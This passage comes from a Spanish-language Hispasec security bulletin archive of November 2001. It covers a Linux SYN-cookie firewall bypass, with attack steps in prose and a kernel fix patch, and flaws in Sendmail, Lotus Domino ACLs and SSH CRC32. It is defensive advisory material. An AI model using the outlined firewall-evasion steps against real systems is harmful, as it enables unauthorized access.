comando "echo 0 > /proc/sys/net/ipv4/tcp_syncookies", aunque ello
limitaría la resistencia del sistema ante un ataque DoS del tipo "Syn
Flood".

Otra solución es parchear el kernel de forma que sólo se active la
protección "SynCookie" para los puertos que estén siendo atacados, no de
forma global para toda la máquina. Dado que el atacante debe tener
acceso al puerto para poder atacarlo, si tenemos el puerto filtrado por
"Syn" en el cortafuegos, éste no será accesible al atacante y no podrá,
por tanto, desarrollar el ataque.

El ataque en sí requiere que:

a) El kernel tenga activada la opción de "SynCookie".
b) Tengamos activado el cortafuegos, y deben existir reglas "Syn".
c) El atacante tenga acceso a, al menos, un puerto "abierto": servidor
web, servidor de IRC, SMTP, etc.

El ataque se produce de la siguiente manera:

a) El atacante realiza un "Syn Flood" sobre el puerto "público" del
servidor, para desencadenar la respuesta "SynCookie" de la máquina.

b) El atacante envía datagramas al puerto que desea "conectar",
intentando forzar el "hash" criptográfico. En media se necesitan unos
ocho millones de datagramas, lo que hace el ataque poco práctico, si
bien puede tener suerte y conseguir entrar al primer intento...

c) Una vez vulnerado el cortafuegos, puede enviar y recibir datos a
través de la conexión abierta, de forma libre.

Todos los kernel Linux con soporte "Syncookie" (a partir de la serie
2.0.*, inclusive) son vulnerables al ataque. Se recomienda actualizar a
los últimos kernel, 2.2.20 o 2.4.14, versiones *NO* vulnerables.

Gracias a los beneficios del código "Open Source", los administradores
que no puedan actualizar el kernel, pueden aplicar directamente el
siguiente parche o uno similar:



diff -urN linux.orig/include/net/sock.h linux/include/net/sock.h
- --- linux.orig/include/net/sock.h Wed Aug 15 22:21:32 2001
+++ linux/include/net/sock.h Wed Nov 7 14:24:36 2001
@@ -416,6 +416,8 @@
unsigned int keepalive_time; /* time before keep alive takes place */
unsigned int keepalive_intvl; /* time interval between keep alive probes */
int linger2;
+
+ unsigned long last_synq_overflow;
};


diff -urN linux.orig/net/ipv4/syncookies.c linux/net/ipv4/syncookies.c
- --- linux.orig/net/ipv4/syncookies.c Wed May 16 18:31:27 2001
+++ linux/net/ipv4/syncookies.c Wed Nov 7 14:23:54 2001
@@ -9,7 +9,7 @@
* as published by the Free Software Foundation; either version
* 2 of the License, or (at your option) any later version.
*
- - * $Id: syncookies.c,v 1.14 2001/05/05 01:01:55 davem Exp $
+ * $Id: syncookies.c,v 1.17 2001/10/26 14:55:41 davem Exp $
*
* Missing: IPv6 support.
*/
@@ -23,8 +23,6 @@

extern int sysctl_tcp_syncookies;

- -static unsigned long tcp_lastsynq_overflow;
- -
/*
* This table has to be sorted and terminated with (__u16)-1.
* XXX generate a better table.
@@ -53,7 +51,9 @@
int mssind;
const __u16 mss = *mssp;

- - tcp_lastsynq_overflow = jiffies;
+
+ sk->tp_pinfo.af_tcp.last_synq_overflow = jiffies;
+
/* XXX sort msstab[] by probability? Binary search? */
for (mssind = 0; mss > msstab[mssind + 1]; mssind++)
;
@@ -78,14 +78,11 @@
* Check if a ack sequence number is a valid syncookie.
* Return the decoded mss if it is, or 0 if not.
*/
- -static inline int cookie_check(struct sk_buff *skb, __u32 cookie)
+static inline int cookie_check(struct sk_buff *skb, __u32 cookie)
{
__u32 seq;
__u32 mssind;

- - if ((jiffies - tcp_lastsynq_overflow) > TCP_TIMEOUT_INIT)
- - return 0;
- -
seq = ntohl(skb->h.th->seq)-1;
mssind = check_tcp_syn_cookie(cookie,
skb->nh.iph->saddr, skb->nh.iph->daddr,
@@ -126,8 +123,8 @@
if (!sysctl_tcp_syncookies ¦¦ !skb->h.th->ack)
goto out;

- - mss = cookie_check(skb, cookie);
- - if (!mss) {
+ if (time_after(jiffies, sk->tp_pinfo.af_tcp.last_synq_overflow +
TCP_TIMEOUT_INIT) ¦¦
+ (mss = cookie_check(skb, cookie)) == 0) {
NET_INC_STATS_BH(SyncookiesFailed);
goto out;
}
@@ -178,7 +175,7 @@
opt &&
opt->srr ? opt->faddr : req->af.v4_req.rmt_addr,
req->af.v4_req.loc_addr,
- - sk->protinfo.af_inet.tos ¦ RTO_CONN,
+ RT_CONN_FLAGS(sk),
0)) {
tcp_openreq_free(req);
goto out;





Jesús Cea Avión
jcea@hispasec.com


Más información:

Linux Syn Filter Evasion Vulnerability
http://www.securityfocus.com/bid/3505

Ataques masivos. ¿Es tan fiero el león como lo pintan?
http://www.hispasec.com/unaaldia.asp?id=474

[suse-security-announce] SuSE Security Announcement: kernel (update)
(SuSE-SA:2001:039)
http://www.suse.com/de/support/security/2001_039_kernel2_txt.txt

Syncookie vulnerability
http://www.linuxsecurity.com/advisories/other_advisory-1683.html

Linux - syncookies firewall breaking problem
http://www.caldera.com/support/security/advisories/CSSA-2001-038.0.txt

kernel 2.2 and 2.4: syncookie vulnerability
http://www.redhat.com/support/errata/RHSA-2001-142.html



martes, 6 de noviembre de 2001

Vulnerabilidades en Sendmail 8.12.0 y previas

Las versiones de Sendmail previas a la 8.12.1 contienen dos
vulnerabilidades que permiten que un usuario local acceda a la cola de
correo del servidor y que, bajo ciertas circunstancias y sistemas
operativos, Sendmail no libere privilegios y siga ejecutándose con un
nivel de acceso innecesariamente elevado.
Sendmail es el MTA ("Mail Transfer Agent") o servidor de correo
electrónico más utilizado en el mundo Unix y en Internet.

Sendmail 8.12.0 y previos contienen una vulnerabilidad que permite que
un usuario malicioso local acceda a la cola de correo del servidor
(donde se almacenan los mensajes que están entrando, y los mensajes
salientes que todavía no se han transferido a su siguiente paso de la
cadena). Si un usuario local fuerza un reprocesamiento de la cola de
correo con un contador de saltos manipulado, por ejemplo, conseguirá que
los mensajes en la cola que hayan superado el número de saltos
manipulado sean eliminados del sistema.

Se crea, por tanto, la posibilidad de un ataque de denegación de
servicio (DoS) y pérdida de información debida a la expiración provocada
de mensajes de correo electrónico.

La segunda vulnerabilidad se debe a que Sendmail 8.12.0 no ajusta los
privilegios en el "saved groupid", lo que permite que un atacante
recupere el "group ID" original si consigue ejecutar código arbitrario
en el servidor de correo (suponiendo que exista una vulnerabilidad
futura que lo permita) que invoque la llamada de sistema "setregid()" o
"setegid()" para recuperar el "group ID" original, privilegiado.

Se recomienda a los usuarios de Sendmail que actualicen a la versión
8.12.1. Esta versión, además, comprobará que la reducción de privilegios
que realiza Sendmail -al ser ejecutado- ha tenido éxito, ya que en
algunos sistemas operativos puede fallar, lo que implicaría que Sendmail
se ejecutaría con privilegios más altos de los necesarios, abriendo una
ventana de oportunidad para cualquier fallo de seguridad futuro que se
descubra. Sendmail 8.12.1 incluye dos herramientas para chequear si
estamos utilizando un sistema operativo problemático o no.



Jesús Cea Avión
jcea@hispasec.com


Más información:

Sendmail 8.12.1
http://www.sendmail.org/8.12.1.html

Sendmail
http://www.sendmail.org/

Multiple Local Sendmail Vulnerabilities
http://razor.bindview.com/publish/advisories/adv_sm812.html

Sendmail Queue Processing Data Loss/DoS Vulnerability
http://www.securityfocus.com/bid/3378

Sendmail Inadequate Privilege Lowering Vulnerability
http://www.securityfocus.com/bid/3377



lunes, 5 de noviembre de 2001

Nuevas vulnerabilidades en Lotus Domino

Se han descubierto diversas vulnerabilidades en el servidor web de lotus
Domino que pueden permitir a los atacantes acceder a funciones
administrativas o acceder a datos sin autorización.
Se ha descubierto una característica del servidor web de Domino que
permite a un usuario anónimo acceder a al archivo de la plantilla del
administrador web (webadmin.ntf) y hacer uso de algunas de sus
funcionalidades. Normalmente webadmin.ntf no debe ser accesible y
esto plantea un alto riesgo de seguridad para los sistemas que ejecutan
Lotus Domino.

La mejor acción para evitar este problema pasa por eliminar la plantilla
Web Administrator del sistema. De igual forma se puede considerar la
eliminación del Administrador Web real, webadmin.nsf.

Lotus informa que en la siguiente versión de Domino, versión 5.0.9, se
asegurarán los permisos sobre el archivo webadmin.ntf para impedir el
acceso anónimo.

Por otra parte una base de datos Lotus Notes contiene documentos
organizados en vistas. Se pueden aplicar listas de control de acceso
a la propia base de datos, vistas y documentos. Si a un usuario se le
deniega el acceso a una vista, es posible evitar la asignación de
permisos en esa vista y acceder a los documentos que se esperan
protegidos.

La razón de que esta vulnerabilidad exista es a causa de que aunque un
documento pueda existir en una vista puede accederse desde cualquier
otra vista. Esto es, todos los documentos en una base de datos Lotus
Notes puede accederse desde cualquier vista.

La solución a este problema es asegurar que si se aplican ACLs a una
vista los documentos en esa vista están también protegidos.



Antonio Ropero
antonior@hispasec.com


Más información:

Aviso de seguridad: Lotus Domino View ACL by-pass:
http://www.nextgenss.com/advisories/viewbypass.txt

Aviso de seguridad: Lotus Domino Web Administrator Template ReplicaID
Access:
http://www.nextgenss.com/advisories/replicaid.txt



domingo, 4 de noviembre de 2001

Popularización de ataques sobre CRC32 SSH

Se ha descubierto la existencia de una vulnerabilidad remota sobre SSH
que está siendo ampliamente explotada. Esta vulnerabilidad puede
permitir a los atacantes remotos la ejecución de código arbitrario en el
sistema afectado sin necesidad de poseer ningún conocimiento específico
de la máquina.
El 30 de junio de 2001 Hispasec ya aviso a través de una-al-dia de la
existencia de este problema en los dispositivos Cisco afectados. La
existencia in the wild de herramientas para rastrear y explotar dicha
vulnerabilidad evidencian la necesidad de paliar este problema.

Según ha desvelado X-Force de ISS, existe un exploit para hacer uso de
esta vulnerabilidad que está siendo empleado in the wild. La naturaleza
de esta vulnerabilidad se combina con la confusión sobre las versiones
de los productos SSH y sus parches.

La vulnerabilidad existe en las versiones afectadas de SSH cuando los
cálculos enteros no se manejan de forma adecuada, lo que provoca una
condición de desbordamiento de búfer. Explotar esta vulnerabilidad se
considera extremadamente difícil, aunque no imposible.

Se recomienda examinar todas las configuraciones para determinar si SSH
Version 1 está activa, recomendándose la actualización a la nueva SSH
Versión 2. Si SSH Versión 1 no se emplea desactivar fallback y elimnar
los antiguos binarios sshd Versión 1.

Es posible mitigar esta vulnerabilidad mediante la prevención,
intercepción o teniendo el control sobre el tráfico SSH.

Para switches Catalyst 6000 todas las vulnerabildiades quedan
eliminadas con las versiones 6.1(2.13), 6.2(0.111) and 6.3(0.7)PAN
de CatOS.

Para PIX Firewall se recomiendan las siguientes actualizaciones
dependiendo de la versión del software:
Para 5.2 se encuentra disponible la actualización a 5.2(5)203,
aunque se recomienda actualizar a 5.2.(6) disponible en agosto.
Para 5.2 se encuentra disponible la actualización a 5.3(1)202,
aunque se recomienda actualizar a 5.3.(1) disponible en agosto.
Para 6.0 se recomienda actualizar a 6.0(1) ya disponible.

Para el resto de productos, dada la cantidad de versiones
diferentes del software, se recomienda consultar la tabla
disponible en la dirección:
http://www.cisco.com/warp/public/707/SSH-multiple-pub.html



Antonio Ropero
antonior@hispasec.com


Más información:

Aviso de ISS:
http://xforce.iss.net/alerts/advise100.php

Aviso de seguridad de Cisco:
http://www.cisco.com/warp/public/707/SSH-multiple-pub.html